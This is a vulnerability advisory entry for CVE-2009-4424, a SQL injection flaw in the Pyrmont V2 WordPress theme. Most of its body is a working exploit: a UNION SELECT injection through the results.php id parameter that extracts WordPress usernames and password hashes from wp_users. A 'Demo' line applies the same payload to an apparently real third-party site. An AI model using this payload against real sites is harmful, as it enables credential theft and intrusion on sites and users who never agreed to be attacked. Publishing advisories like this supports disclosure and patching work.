Topic : | WordPress and Pyrmont V2. SQL Injection Vulnerability
|
SecurityAlert : 6880
CVE : CVE-2009-4424
CWE : CWE-89
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : Gamoscu
Published : 30.12.2009
Affected Software : | imotta:pyrmont_plugin:2 |
 Advisory Content : #############################################################
# WordPress and Pyrmont V2. SQL Injection Vulnerability
# Plugin Home: http://wordpress.org/extend/themes/pyrmont-v2
# Author: Gamoscu
# Site: www.1923turk.biz
# Site: http://gamoscu.wordpress.com/
##############################################################
# Exploit:
http://server/path/results.php?id=-9999+union+select+1,concat_ws(0x3a,user_
login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
+from+wp_users
-9999+union+select+1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users
# Demo:
http://cc.cc.moose.cc/maps/results.php?id=-9999+union+select+1,concat_ws(0x
3a,user_login,user_pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24+from+wp_users
##############################################################
# Greetz: Manas58 Baybora Delibey Tiamo Psiko
##############################################################
Vatan Lafla Deðil Eylemle Sevilir
References :
http://xforce.iss.net/xforce/xfdb/54907
http://www.securityfocus.com/bid/37409
http://www.exploit-db.com/exploits/10535
http://packetstormsecurity.org/0912-exploits/wppyrmont-sql.txt
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|